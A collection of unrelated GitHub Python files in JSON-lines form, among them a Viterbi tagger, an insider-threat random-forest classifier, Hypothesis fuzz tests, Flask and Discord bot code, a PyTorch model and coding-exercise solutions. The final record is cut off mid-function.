{"seq_id":"28952756956","text":"from parseinput import *\nfrom collections import defaultdict\nimport numpy as np\nimport math\n\nclass Viterbi:\n    def __init__(self, lexicon, tags):\n        self.tags = ['<START>', '<END>'] + tags #adding start and end tags\n        self.trans_count = [] #count of arcs from s0 to s1\n        self.emit_count = {} #count of emission of words in state s1\n        self.state_count = [0]*len(self.tags) #count of words in state s\n        self.tag_index = {}\n\n        self.tp = []\n        self.ep = {}\n        i = 0\n        for tag in self.tags:\n            self.tag_index[tag] = i\n            i = i + 1\n        \n        #initialize the transition matrix\n        for tag in self.tags:\n            self.trans_count.append([0] * len(self.tags))\n            self.emit_count[self.tag_index[tag]] = dict()\n\n            self.tp.append([0] * len(self.tags))\n            self.ep[self.tag_index[tag]] = dict()\n\n    #calculate the counts for all states and words(useful to calculate tp and ep)\n    def getCounts(self, sentences):\n        for sentence in sentences:\n            sentence = [('<START>', '<START>')] + sentence + [('<END>', '<END>')]\n            for i in range(len(sentence) - 1):\n                word, tag_c = sentence[i]\n                state = self.tag_index[tag_c]\n                \n                word_n, tag_n = sentence[i+1]\n                n_state = self.tag_index[tag_n]\n\n                self.trans_count[state][n_state] += 1\n\n                d = self.emit_count[state];\n                self.emit_count[state][word] = d.get(word, 0) + 1\n                self.state_count[state] += 1\n\n\n    def calculateProb(self):\n        smoothingfactor = 0.0001\n        for i in range(len(self.trans_count)):\n            for j in range(len(self.trans_count[i])):\n                try:\n                    self.tp[i][j] = float(self.trans_count[i][j])/float(self.state_count[i])\n                except:\n                    self.tp[i][j] = 0.0\n\n        for i in range(len(self.emit_count)):\n            for word in self.emit_count[i].keys():\n                try:\n                    self.ep[i][word] = float(self.emit_count[i][word])/float(self.state_count[i])\n                except:\n                    self.ep[i][word] = 0.0\n\n    def decode(self, sentence):\n        N = len(sentence)\n        \n        T = len(self.tags)\n\n        #viterbi table\n        vt = np.zeros((N,T))\n        bt = {}\n        \n\n        #for initialization - start tags\n        start = self.tag_index['<START>']\n        for tag in self.tags:\n            ti = self.tag_index[tag]\n            try:\n                vt[0][ti] = self.tp[start][ti] * self.ep[ti][sentence[0]]\n            except:\n                vt[0][ti] = self.tp[start][ti] * 0.00000001\n            bt[(0,tag)] = 0\n\n        #Iteratively calculate for time 1 to N\n        for i in range(1, N):  # range, not the Python 2-only xrange\n            for tag in self.tags:\n                tag_id = self.tag_index[tag]\n                prev_vt = {}\n                for prev in self.tags:\n                    prev_id = self.tag_index[prev]\n                    prev_vt[(i-1, prev)] = vt[i-1][prev_id] * self.tp[prev_id][tag_id]\n                \n                try: \n                    vt[i][tag_id] = max(prev_vt.values()) * self.ep[tag_id][sentence[i]]\n                except:\n                    vt[i][tag_id] = max(prev_vt.values()) * 0.00000001\n                \n                bt[(i,tag)] = max(prev_vt, key=prev_vt.get)\n        \n        prev_vt = {}\n        #termination step\n        for prev in self.tags:\n            prev_id = self.tag_index[prev]\n            prev_vt[(N-1, prev)] = vt[N-1][prev_id] * self.tp[prev_id][self.tag_index['<END>']]\n\n        bt[(N, \"<END>\")] = max(prev_vt, key=prev_vt.get)\n        \n        sequence = []\n        bp = bt[(N, \"<END>\")]\n        while bp != 0:\n            sequence.append(bp[1])\n            bp = bt[bp]\n        sequence.reverse()\n        return [(sentence[i],sequence[i]) for i in range(0, 
len(sentence))]\n\n\n","repo_name":"Narasimman/NaturalLanguageProcessing","sub_path":"hmm-tagger/viterbi.py","file_name":"viterbi.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1139892005","text":"import pandas as pd\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nhttp = pd.read_csv('D:/Datasets/r4.2/r4.2/http.csv')\r\nemail = pd.read_csv('D:/Datasets/r4.2/r4.2/email.csv')\r\nfile = pd.read_csv('D:/Datasets/r4.2/r4.2/file.csv')\r\nlogon = pd.read_csv('D:/Datasets/r4.2/r4.2/logon.csv')\r\n\r\ndata = pd.concat([http, email, file, logon])\r\n\r\ndata['date'] = pd.to_datetime(data['date'], format='%Y-%m-%d %H:%M:%S')\r\n\r\ndata['hour'] = data['date'].dt.hour\r\ndata['dayofweek'] = data['date'].dt.dayofweek\r\ndata['month'] = data['date'].dt.month\r\ndata['year'] = data['date'].dt.year\r\n\r\ndata = data.drop(['id', 'date', 'user', 'pc'], axis=1)\r\n\r\ndata = pd.get_dummies(data, columns=['activity'])\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(data.drop('threat', axis=1), data['threat'], test_size=0.3, random_state=42)\r\n\r\nmodel = RandomForestClassifier(n_estimators=100, random_state=42)\r\nmodel.fit(X_train, y_train)\r\n\r\ny_pred = model.predict(X_test)\r\naccuracy = accuracy_score(y_test, y_pred)\r\nprint('Accuracy: {:.2f}%'.format(accuracy*100))\r\n","repo_name":"im90866/InsiderThreatDetection","sub_path":"RF2.py","file_name":"RF2.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35646849036","text":"# This test code was written by the `hypothesis.extra.ghostwriter` module\r\n# and is provided under the Creative Commons Zero public domain dedication.\r\n\r\nimport datetime\r\nimport io\r\nimport typing\r\n\r\nimport _io\r\nfrom _io import StringIO\r\nfrom hypothesis import given\r\nfrom hypothesis import strategies as st\r\n\r\nimport markpickle\r\nimport markpickle.config_class\r\nfrom markpickle.serialize import unsafe_falsy_type, unsafe_scalar_type\r\n\r\n\r\n@given(\r\n # config class creates garbage if messed up\r\n config=st.just(\r\n markpickle.config_class.Config(infer_scalar_types=False)\r\n ), # .from_type(typing.Optional[markpickle.config_class.Config]),\r\n value=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.text(),\r\n ),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.lists(\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n )\r\n ),\r\n st.text(),\r\n ),\r\n)\r\ndef test_roundtrip_dumps_loads(\r\n config: typing.Optional[markpickle.config_class.Config],\r\n value: typing.Union[\r\n typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n dict[str, typing.Union[None, str, 
int, float, datetime.date]],\r\n dict[\r\n str,\r\n typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n ],\r\n ],\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n list[dict[str, typing.Union[None, str, int, float, datetime.date]]],\r\n ],\r\n str,\r\n ],\r\n) -> None:\r\n if unsafe_falsy_type(value):\r\n # falsies will not roundtrip.\r\n return\r\n if unsafe_scalar_type(value):\r\n # non-strings will not roundtrip.\r\n return\r\n\r\n value0 = markpickle.dumps(value=value, config=config)\r\n value1 = markpickle.loads(value=value0, config=config)\r\n if value != value1:\r\n print(\"whoa\")\r\n assert value == value1, (value, value1)\r\n\r\n\r\n@given(\r\n infer_scalar_types=st.booleans(),\r\n true_values=st.lists(st.text()),\r\n false_values=st.lists(st.text()),\r\n none_values=st.lists(st.text()),\r\n empty_string_is=st.text(),\r\n serialize_headers_are_dict_keys=st.booleans(),\r\n serialize_dict_as_table=st.booleans(),\r\n serialize_child_dict_as_table=st.booleans(),\r\n none_string=st.text(),\r\n)\r\ndef test_fuzz_Config(\r\n infer_scalar_types: bool,\r\n true_values: list[str],\r\n false_values: list[str],\r\n none_values: list[str],\r\n empty_string_is: str,\r\n serialize_headers_are_dict_keys: bool,\r\n serialize_dict_as_table: bool,\r\n serialize_child_dict_as_table: bool,\r\n none_string: str,\r\n) -> None:\r\n markpickle.Config(\r\n infer_scalar_types=infer_scalar_types,\r\n true_values=true_values,\r\n false_values=false_values,\r\n none_values=none_values,\r\n empty_string_is=empty_string_is,\r\n serialize_headers_are_dict_keys=serialize_headers_are_dict_keys,\r\n serialize_dict_as_table=serialize_dict_as_table,\r\n serialize_child_dict_as_table=serialize_child_dict_as_table,\r\n none_string=none_string,\r\n )\r\n\r\n\r\n@given(\r\n value=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(\r\n st.none(),\r\n st.dates(),\r\n st.floats(),\r\n st.integers(),\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.text(),\r\n ),\r\n ),\r\n st.lists(st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text())),\r\n st.lists(\r\n st.dictionaries(\r\n keys=st.text(),\r\n values=st.one_of(st.none(), st.dates(), st.floats(), st.integers(), st.text()),\r\n )\r\n ),\r\n st.text(),\r\n ),\r\n stream=st.just(io.StringIO),\r\n config=st.from_type(typing.Optional[markpickle.config_class.Config]),\r\n)\r\ndef test_fuzz_dump(\r\n value: typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n dict[\r\n str,\r\n typing.Union[\r\n None,\r\n str,\r\n int,\r\n float,\r\n datetime.date,\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n dict[str, typing.Union[None, str, int, float, datetime.date]],\r\n ],\r\n ],\r\n list[typing.Union[None, str, int, float, datetime.date]],\r\n list[dict[str, typing.Union[None, str, int, float, datetime.date]]],\r\n ],\r\n stream: io.IOBase,\r\n config: typing.Optional[markpickle.config_class.Config],\r\n) -> 
None:\r\n    markpickle.dump(value=value, stream=stream, config=config)\r\n\r\n\r\n@given(\r\n    value=st.builds(StringIO),\r\n    config=st.from_type(typing.Optional[markpickle.config_class.Config]),\r\n)\r\ndef test_fuzz_load(value: _io.StringIO, config: typing.Optional[markpickle.config_class.Config]) -> None:\r\n    markpickle.load(value=value, config=config)\r\n","repo_name":"matthewdeanmartin/markpickle","sub_path":"test_hypothesis/test_hypothesis.py","file_name":"test_hypothesis.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
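The markpickle tests above are instances of Hypothesis's round-trip property pattern: generate a value, serialize it, parse it back, and assert nothing was lost. A minimal self-contained sketch of the same pattern against the standard json codec; the strategy choice is an illustrative assumption.

import json

from hypothesis import given, strategies as st

@given(st.dictionaries(st.text(), st.integers()))
def test_json_roundtrip(value):
    # dumps/loads must be mutually inverse on JSON-safe values
    assert json.loads(json.dumps(value)) == value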
{"seq_id":"19629437630","text":"from flask import Blueprint, request\nfrom Response import Response\nfrom Models.AgriWatchView import AgriWatchView\nfrom Services.AgriWatchViewService import AgriWatchViewService\nfrom Services.AuthenticationService import AuthenticationService\nfrom flask_restplus import Resource, Namespace\n\nAgriWatchViewService = AgriWatchViewService()\nAuthenticationService = AuthenticationService()\nview_ns = Namespace('view', 'view methods')\n\n@view_ns.route('/create')\nclass CreateNewView(Resource):\n    @view_ns.doc(\n        responses = {\n            400: \"Create new AgriWatch view error.\"\n        },\n        params = {\n            'SID': {'in': 'cookies', 'required': True},\n        }\n    )\n    def post(self):\n        if (\"SID\" not in request.cookies):\n            return Response(\"No session detected\", status=400)\n        \n        view = AgriWatchViewService.createView(request)\n\n        return Response(str(view.dataset)+str(view.visualType))\n\n@view_ns.route('/fetch')\nclass FetchViews(Resource):\n    @view_ns.doc(\n        responses = {\n            400: \"Error fetching AgriWatch views.\"\n        },\n        params = {\n            'SID': {'in': 'cookies', 'required': True},\n        }\n    )\n    def get(self):\n        retList = []\n        user = AuthenticationService.verifySessionAndReturnUser(request.cookies[\"SID\"])\n\n        views = AgriWatchView.objects.filter(author=user).order_by('-dateCreated')\n\n        for view in views:\n            if view == None:\n                return Response(\"No views found\", status=400)\n            retList.append(AgriWatchViewService.makeViewObject(view))\n        return Response(retList)","repo_name":"Agriworks/agriworks_platform","sub_path":"Controllers/AgriWatchViewController.py","file_name":"AgriWatchViewController.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} {"seq_id":"35035522324","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Q) \n# \n# There is a sequence of N numbers A[1], A[2], …, A[N]. Write a program that counts the number of cases in which the sum A[i] + A[i+1] + … + A[j-1] + A[j] of the i-th through j-th numbers equals M.\n\n# # A) \n# \n# 1) Start with both the start point and the end point (element indices) at 0, \n# \n# 2) if tmp is smaller than the required value, advance the end point by 1, \n# \n# 3) if tmp equals m, add 1 to cnt and advance the start point by 1, \n# \n# 4) if tmp is greater than m, subtract the start-point number from tmp, then advance the start point by 1. \n# \n\n# In[8]:\n\n\nn,m = map(int,input().split())\nnum = list(map(int,input().split()))\ntmp = num[0]\ncnt, sp, ep = 0, 0, 0\n\nwhile True:\n    if tmp < m: # if the partial sum is smaller than m, advance the end point by 1 \n        ep += 1\n        if ep >= n: # exit the while loop once the end point reaches n \n            break\n        tmp += num[ep]\n    elif tmp == m :\n        cnt += 1\n        tmp -= num[sp]\n        sp += 1\n    else: \n        tmp -= num[sp]\n        sp += 1\nprint(cnt)\n\n","repo_name":"YONJUS/Coding-Test","sub_path":"22_백준_2003_수들의합_그리디.py","file_name":"22_백준_2003_수들의합_그리디.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
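To make the sliding-window bookkeeping above concrete, here is a small self-contained variant with hard-coded input; the array and target are illustrative values, not 백준 test data. It relies on the same assumption as the original: all elements are positive, so the window sum changes monotonically as either pointer advances.

def count_subarrays_with_sum(nums, target):
    # two-pointer window: grow the right end, shrink from the left
    # whenever the running sum overshoots the target
    count, window, left = 0, 0, 0
    for right, value in enumerate(nums):
        window += value
        while window > target:
            window -= nums[left]
            left += 1
        if window == target:
            count += 1
    return count

print(count_subarrays_with_sum([1, 2, 1, 2, 1], 3))  # 4 windows: [1,2], [2,1], [1,2], [2,1]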
{"seq_id":"34734288056","text":"import datetime\nfrom data import db_session\nfrom data.Inner.AuditlogAPI import add_auditlog\nfrom data.phone import Phone\nfrom data.Inner.main_file import raise_error, check_admin_status\n\n\ndef find_by_id(id, session):\n    phone = session.query(Phone).get(id)\n    if not phone:\n        return raise_error(f\"Номер телефона не найден\", session), 1\n    return phone, session\n\n\ndef get_phone_list():\n    session = db_session.create_session()\n    phones = session.query(Phone).all()\n    session.close()\n    return [item.to_dict(only=('id', 'number')) for item in phones]\n\n\ndef edit_phone(phone_id, args):\n    if not all(args[key] is not None for key in ['admin_email', 'action']):\n        return raise_error('Пропущены некоторые важные аргументы')\n    admin, session = check_admin_status(args['admin_email'])\n    phone, session = find_by_id(phone_id, session)\n    if type(phone) == dict:\n        session.close()\n        return phone\n    if args['action'] == \"get\":\n        session.close()\n        return phone.to_dict(only=('id', 'number'))\n    elif args['action'] == 'delete':\n        session.delete(phone)\n        session.commit()\n        add_auditlog(\"Удаление\", f\"Админ {admin.name} {admin.surname} удаляет номер телефона {phone.number}\", admin,\n                     datetime.datetime.now())\n        session.close()\n        return {\"success\": f\"Номер телефона {phone.number} успешно удалён\"}\n    elif args['action'] == 'put':\n        count = 0\n        phone_dict = phone.to_dict(only=('number',))\n        keys = list(filter(lambda key: args[key] is not None and key in phone_dict and args[key] != phone_dict[key], args.keys()))\n        for key in keys:\n            count += 1\n            if key == 'number':\n                if session.query(Phone).filter(Phone.number == args['number']).first():\n                    raise_error(\"Этот номер телефона уже существует\", session)\n                phone.number = args[\"number\"]\n        if count == 0:\n            return raise_error(\"Пустой запрос\", session)\n        phone_dict_2 = phone.to_dict(only=('number',))\n        list_chang = [f'изменяет {key} с {phone_dict[key]} на {phone_dict_2[key]}' for key in keys]\n        session.commit()\n        add_auditlog(\"Изменение\", f\"Админ {admin.name} {admin.surname} изменяет номер телефона {phone.number}:\"\n                                  f\" {', '.join(list_chang)}\", admin, datetime.datetime.now())\n        session.close()\n        return {\"success\": f\"Номер телефона {phone.number} успешно изменён\"}\n    return raise_error(\"Неизвестный метод\", session)\n\n\ndef create_phone(args):\n    if not all(args[key] is not None for key in ['number', 'admin_email']):\n        return raise_error('Пропущены некоторые аргументы, необходимые для добавления нового номера телефона')\n    admin, session = check_admin_status(args['admin_email'])\n    if session.query(Phone).filter(Phone.number == args['number']).first():\n        return raise_error(\"Этот номер телефона уже существует\", session)\n    new_phone = Phone()\n    new_phone.number = args[\"number\"]\n    session.add(new_phone)\n    session.commit()\n    add_auditlog(\"Создание\", f\"Админ {admin.name} {admin.surname} добавляет номер телефона {new_phone.number}: {new_phone.to_dict(only=('id', 'number'))}\",\n                 admin, datetime.datetime.now())\n    session.close()\n    return {'success': f'Номер телефона {new_phone.number} создан'}\n","repo_name":"nikniksham/website_bc","sub_path":"data/Inner/PhoneAPI.py","file_name":"PhoneAPI.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"25944083419","text":"import discord\nfrom discord.ext import commands\nfrom core.classes import Cog_Extension\nfrom core import check\nimport json\nimport os, random, datetime, requests\n\nwith open('setting.json', 'r', encoding='utf8') as jfile:\n\tjdata = json.load(jfile)\n\nclass Main(Cog_Extension):\n\t@commands.command()\n\tasync def ping(self, ctx):\n\t\tawait ctx.send(f'{round(self.bot.latency*1000)} ms')\n\n\n\t@commands.command()\n\t@check.valid_user() # permission check: only users on the valid-user list may run this command\n\tasync def test(self, ctx):\n\t\tawait ctx.send('Bee! Bo!')\n\t\t\n\n\t@commands.command()\n\tasync def sayd(self, ctx, *, content: str):\n\t\tif \"@everyone\" in content:\n\t\t\tawait ctx.send(f\"{ctx.author.mention} Do not ping `everyone` !\")\n\t\t\tawait ctx.message.delete()\n\t\t\treturn\n\t\telse: await ctx.message.delete()\n\t\tawait ctx.send(content)\n\t\n\n\t@commands.Cog.listener()\n\tasync def on_raw_reaction_add(self, data):\n\t\tif data.message_id == (839110873011191814):\n\t\t\tif str(data.emoji) == '<:pogchamp:839098827427545118>':\n\t\t\t\tguild = self.bot.get_guild(data.guild_id)\n\t\t\t\trole = guild.get_role(839100920095965234)\n\t\t\t\tawait data.member.add_roles(role)\n\t\t\t\tawait data.member.send(f\"You get {role} role!\")\n\n\t@commands.Cog.listener()\n\tasync def on_raw_reaction_remove(self, data):\n\t\tif data.message_id == (839110873011191814):\n\t\t\tif str(data.emoji) == '<:pogchamp:839098827427545118>':\n\t\t\t\tguild = self.bot.get_guild(data.guild_id)\n\t\t\t\tuser = await guild.fetch_member(data.user_id)\n\t\t\t\trole = guild.get_role(839100920095965234)\n\t\t\t\tawait user.remove_roles(role)\n\t\t\t\tawait user.send(f\"You remove {role} role!\")\n\n\n\t@commands.Cog.listener()\n\tasync def on_message_delete(self, msg):\n\t\tembed = discord.Embed(title=\"There is a member deleted the message!\", description=\"\", color= 0x28ddb0)\n\t\tembed.add_field(name=\"Message sender \", value= str(msg.author.mention), inline=False)\n\t\tembed.add_field(name=\"Deleted message\", value= str(msg.content) , inline=True)\n\t\tawait msg.channel.send(embed=embed)\n\n\t@commands.command()\n\tasync def info(self, ctx):\n\t\tembed = discord.Embed(title=\"About GGR-bot\", description=\"This bot is testing!\", color= 0x28ddb0)\n\t\tembed.add_field(name=\"Developers\", value=\"<@!538639229220028416>\", inline=True)\n\t\tembed.add_field(name=\"Support Server\", value=\"[Server Link](https://discord.gg/jgpqZpJ6QQ)\" , inline=True)\n\t\tembed.add_field(name=\"Version\", value=\"BETA 0.1.0\", inline=False)\n\t\tembed.add_field(name=\"Powered by\", value=\"discord.py v{}\".format(discord.__version__), inline=True)\n\t\tembed.add_field(name=\"Prefix\", value=jdata['Prefix'], inline=True)\n\t\tembed.add_field(name=\"Invite\", value=\"[Invite 
Link](https://discord.com/api/oauth2/authorize?client_id=837656833413873725&permissions=8&scope=bot)\" , inline=False)\n\t\tembed.set_thumbnail(url=\"https://cdn.discordapp.com/attachments/838370690109407242/839480933027282984/GGR.png\")\n\t\tawait ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(Main(bot))","repo_name":"GGReric/GGR_bot","sub_path":"cmds/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23837219110","text":"import datetime\nimport re\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\nfrom telethon.tl.types import DocumentAttributeFilename\n\nfrom .. import bot\nfrom ..handlers.commandhandler import CommandHandler\n\n\n@CommandHandler.handler(\n command=\"nightly\", prefixes=['!', '/', '#'],\n chats=[-1001361570927, -1001374518507])\nasync def get_nightly(event):\n \"\"\"Fetch the latest Aurora Store Nightly\"\"\"\n reply = await event.reply(\"`Fetching apk file ...`\")\n chat = await event.get_chat()\n if chat.id == 1361570927:\n url = \"https://auroraoss.com/AuroraStore/Nightly/\"\n else:\n url = \"https://auroraoss.com/AuroraDroid/Nightly/\"\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as get:\n if get.status in [200, 201]:\n soup = BeautifulSoup(await get.text(), features=\"html.parser\")\n nightlies = {}\n for td in soup.find_all(\"tr\"):\n version = td.find(\"td\", class_=\"fb-n\")\n date = td.find(\"td\", class_=\"fb-d\")\n if version and date:\n try:\n nightlies.update({datetime.datetime.strptime(\n date.text, \"%Y-%m-%d %H:%M\"): version.text})\n except ValueError:\n pass\n latest_date = sorted(nightlies.keys(), reverse=True)[0]\n latest_version = nightlies[latest_date]\n async with session.get(f\"{url}{latest_version}\") as apk:\n await bot.send_file(event.chat, await apk.read(), caption=f\"**Aurora Nightly uploaded at** `{latest_date.strftime('%Y-%m-%d %H:%M')}`\",\n attributes=[DocumentAttributeFilename(file_name=latest_version)])\n await reply.delete()\n\n__HELP__ = \"\"\"\\n• __`nightly` - Get the latest Aurora Nightly available. 
(This command can also be used as a note)__\"\"\"\n","repo_name":"im-Satyendra/bug","sub_path":"bot/modules/nightlty.py","file_name":"nightlty.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71611164713","text":"import moviepy.editor as mp\r\n\r\ndef sound(path,token):\r\n print(\"vts1\")\r\n my_clip = mp.VideoFileClip(path)\r\n print(\"vts2\")\r\n temp = \"my_result\" + str(token) + \".wav\"\r\n my_clip.audio.write_audiofile(temp)\r\n print(\"vts3\")\r\n return temp","repo_name":"BrooCode/Semi-live","sub_path":"backend/vts.py","file_name":"vts.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39012800310","text":"import copy \nimport datetime\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nfrom torch.nn.utils import clip_grad_norm_\nfrom .utils import logmsg\n\nclass BLNN(torch.nn.Module):\n ''' Classic neural network implementation which serves as a baseline NN model '''\n\n stats_dict = {'training': [],\n 'testing': [],\n 'grad_norms': [],\n 'grad_stds': []}\n\n def __init__(self, d_in, d_hidden, d_out, activation_fn):\n super(BLNN, self).__init__()\n self.layers = torch.nn.ModuleList()\n self.nonlinearity = []\n self.d_in = d_in\n self.d_out = d_out\n self.d_hidden = d_hidden\n #self.loss_fn = BLNN.xy_loss\n self.loss_fn = torch.nn.MSELoss()\n\n if activation_fn == 'Tanh':\n nonlinear_fn = torch.nn.Tanh()\n elif activation_fn == 'ReLU':\n nonlinear_fn = torch.nn.ReLU()\n\n self.layers.append(torch.nn.Linear(d_in, d_hidden[0]))\n self.nonlinearity.append(nonlinear_fn)\n\n for i in range(len(d_hidden) - 1):\n self.layers.append(torch.nn.Linear(d_hidden[i], d_hidden[i + 1]))\n self.nonlinearity.append(nonlinear_fn)\n\n self.last_layer = torch.nn.Linear(d_hidden[-1], d_out, bias=None)\n\n for i in range(len(self.layers)):\n torch.nn.init.orthogonal_(self.layers[i].weight)\n\n torch.nn.init.orthogonal_(self.last_layer.weight)\n #logmsg(\"model: {}\".format(self))\n\n def init_device(self):\n self.device = self.state_dict()['layers.0.weight'].get_device()\n self.sdevice = torch.device(f\"cuda:{self.device}\" if self.device >= 0 else \"cpu\")\n self.loss_fn = self.loss_fn.to(self.sdevice)\n\n return self.device\n\n def forward(self, x):\n dict_layers = dict(zip(self.layers, self.nonlinearity))\n for layer, nonlinear_transform in dict_layers.items():\n out = nonlinear_transform(layer(x))\n x = out\n return self.last_layer(out)\n\n def time_derivative(self, x):\n return self(x)\n\n def average_gradients(self):\n size = float(dist.get_world_size())\n for param in self.parameters():\n dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)\n param.grad.data /= size\n\n def validate(self, args, data, device):\n self.eval()\n #loss_fn = torch.nn.MSELoss().to(device)\n device = self.state_dict()['layers.0.weight'].get_device()\n if args.input_noise != '':\n npnoise = np.array(args.input_noise, dtype=\"float\")\n noise = torch.tensor(npnoise).to(device)\n\n # the validation data stream is configured to return the entire set in a \n # single, randomized batch:\n with torch.no_grad():\n for x, dxdt in data:\n dxdt_hat = self.time_derivative(x)\n if args.input_noise != '':\n dxdt_hat += noise * torch.randn(*x.shape).to(device) # add noise, maybe\n return self.loss_fn(dxdt_hat, dxdt).item()\n #return loss_fn(dxdt_hat, dxdt).item()\n\n # epoch train:\n def etrain(self, args, 
train_data, optimizer):\n        self.train()\n        torch.manual_seed(args.seed)\n        np.random.seed(args.seed)\n        stats = copy.deepcopy(BLNN.stats_dict)\n        addnoise = False\n        if args.input_noise != '':\n            addnoise = True\n            npnoise = np.array(args.input_noise, dtype=\"float\")\n            noise = torch.tensor(npnoise)  # moved to the batch's device inside the loop (torchdev was never defined)\n\n        batches = 0\n        for x, dxdt in train_data:\n            optimizer.zero_grad()\n            dxdt_hat = self.time_derivative(x)\n            if addnoise:\n                dxdt_hat += noise.to(x.device) * torch.randn(*x.shape).to(x.device) # add noise, maybe\n            loss = self.loss_fn(dxdt_hat, dxdt)\n            loss.backward()\n            self.average_gradients()\n            if args.clip != 0:\n                clip_grad_norm_(self.parameters(), args.clip)\n            optimizer.step()\n\n            grad = torch.cat([p.grad.flatten() for p in self.parameters()])\n            stats['training'].append(loss.item())\n            stats['grad_norms'].append((grad @ grad).item())\n            stats['grad_stds'].append(grad.std().item())\n\n            if args.verbose and ((batches % args.print_every == 0) and self.device <= 0):\n                grad_norm = grad @ grad\n                logmsg(\"batch[{}] train loss {:.4e}, grad norm: {:.4e}, grad std: {:.4e}\"\n                       .format(batches, loss.item(), grad_norm, grad.std()))\n                logmsg('\\tgrad: {}'.format(grad))\n                for name, param in self.named_parameters():\n                    logmsg('\\t{}: {}'.format(name, param.data))\n                logmsg('x: {}'.format(x))\n                logmsg('dxdt: {}'.format(dxdt))\n            batches += 1\n\n        return stats\n\n    def set_label(self, label):\n        self.run_label = label\n\n    def xy_loss(dxhat, dx):\n        loss = ((dxhat - dx)**2).sum()\n        return loss\n","repo_name":"ScottThomasMiller/ScottsML","sub_path":"gpu/nail/hnn/blnn.py","file_name":"blnn.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"42556767711","text":"# https://leetcode.com/problems/majority-element-ii/\n\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n    def majorityElement(self, nums: List[int]) -> List[int]:\n        # solution: hashmap\n\n        # ---\n        n = len(nums)\n        third = n / 3\n        counts_dict = defaultdict(int)\n        for num in nums:\n            counts_dict[num] += 1\n\n        # ---\n        res = []\n        for num, count in counts_dict.items():\n            if count > third:\n                res.append(num)\n        return res\n    \n","repo_name":"yukikongju/LeetCodeTraining","sub_path":"LeetCodePython/229-MajorityElementII-Hashmap.py","file_name":"229-MajorityElementII-Hashmap.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
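The hashmap solution above costs O(n) extra space. For contrast, a sketch of the O(1)-space Boyer-Moore extension for the same n/3 problem: at most two distinct values can each appear more than n/3 times, so two candidate/counter pairs plus a verification pass suffice. The function name is illustrative, not from the original file.

def majority_element_n3(nums):
    # phase 1: maintain two candidates with vote counters
    cand1, cand2, cnt1, cnt2 = None, None, 0, 0
    for n in nums:
        if n == cand1:
            cnt1 += 1
        elif n == cand2:
            cnt2 += 1
        elif cnt1 == 0:
            cand1, cnt1 = n, 1
        elif cnt2 == 0:
            cand2, cnt2 = n, 1
        else:
            cnt1 -= 1
            cnt2 -= 1
    # phase 2: the survivors are only candidates; verify their true counts
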